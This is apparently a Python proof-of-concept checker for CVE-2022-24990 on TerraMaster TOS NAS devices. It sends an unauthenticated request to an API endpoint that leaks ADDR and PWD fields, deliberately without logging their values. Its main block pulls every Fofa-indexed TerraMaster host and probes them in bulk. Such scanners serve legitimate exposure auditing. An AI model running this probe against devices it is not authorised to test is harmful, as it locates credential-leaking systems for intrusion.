CVE-2022-24990.py
from loguru import logger
from pocx import AioPoc
from pocx.funcs import Fofa
import json
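class CVE_2022_24990(AioPoc):
    """Exposure check for CVE-2022-24990 on TerraMaster TOS.

    The check requests ``/module/api.php?mobile/webNasIPS`` on the target;
    this method supplies no credentials. A target is reported as vulnerable
    when the body contains ``successful`` and the JSON ``data`` object
    carries both an ``ADDR`` and a ``PWD`` key.

    Only the presence of those keys is tested. Their values are never logged
    or stored, since ``PWD`` is presumably credential material -- keep it
    that way when extending the check.
    """

    def __init__(self):
        super(CVE_2022_24990, self).__init__()
        self.name = 'TerraMaster TOS Unauthenticated Attacker Vulnerability CVE-2022-24990'
        self.cve = 'CVE-2022-24990'

    async def poc(self, target: str):
        """Return True when ``target`` answers the probe with the leaked fields.

        Args:
            target: Base URL of the device; a trailing slash is tolerated.

        Returns:
            True if the response matches the vulnerable pattern, False
            otherwise. False is also returned when the request itself fails,
            but that case is logged as "could not be checked" rather than
            "not vulnerable", so an unreachable host is not mistaken for a
            patched one.
        """
        # Strip a trailing slash so the path is not sent as "//module/...".
        url = target.rstrip("/") + "/module/api.php?mobile/webNasIPS"

        try:
            req = await self.aio_get(url=url)
            raw = req.content
        except Exception as exc:
            # The exceptions aio_get can raise are not visible here, so the
            # catch stays broad; the failure is reported instead of swallowed.
            logger.warning(f"[!]{target} could not be checked ({type(exc).__name__})")
            return False

        try:
            body = raw.decode("utf-8")
            payload = json.loads(body)
        except ValueError:
            # Covers UnicodeDecodeError and JSONDecodeError: the host answered,
            # but not with the JSON document the vulnerable endpoint returns.
            body, payload = "", None

        data = payload.get('data') if isinstance(payload, dict) else None
        # Require a JSON object so a null or scalar 'data' cannot raise here.
        if "successful" in body and isinstance(data, dict) and 'ADDR' in data and 'PWD' in data:
            logger.success(f'[+]{target} is vulnerable')
            return True

        logger.error(f"[-]{target} is not vulnerable")
        return False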
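if __name__ == '__main__':
    import os

    # Fofa query selecting hosts fingerprinted as TerraMaster NAS. It matches
    # every indexed host with that fingerprint; narrow it (for example to the
    # organisation's own ranges) to scope an exposure inventory.
    grammar = 'app="TERRAMASTER-NAS"'
    poc = CVE_2022_24990()
    fofa = Fofa()

    # Read the Fofa credentials from the environment so real keys are never
    # pasted into the file and committed. The variable names are chosen here.
    api_key = os.environ.get('FOFA_API_KEY')
    api_email = os.environ.get('FOFA_API_EMAIL')
    if not api_key or not api_email:
        raise SystemExit('set FOFA_API_KEY and FOFA_API_EMAIL in the environment')
    fofa.set_config(api_key=api_key, api_email=api_email)

    print(f'[+] the asset account of grammar: {grammar} are: {fofa.asset_counts(grammar)}')
    pages = fofa.asset_pages(grammar)
    # Walk the result pages one at a time and hand each batch to the checker.
    for page in range(1, pages + 1):
        print(f'[*] page {page}')
        assets = fofa.assets(grammar, page)
        poc.run(assets)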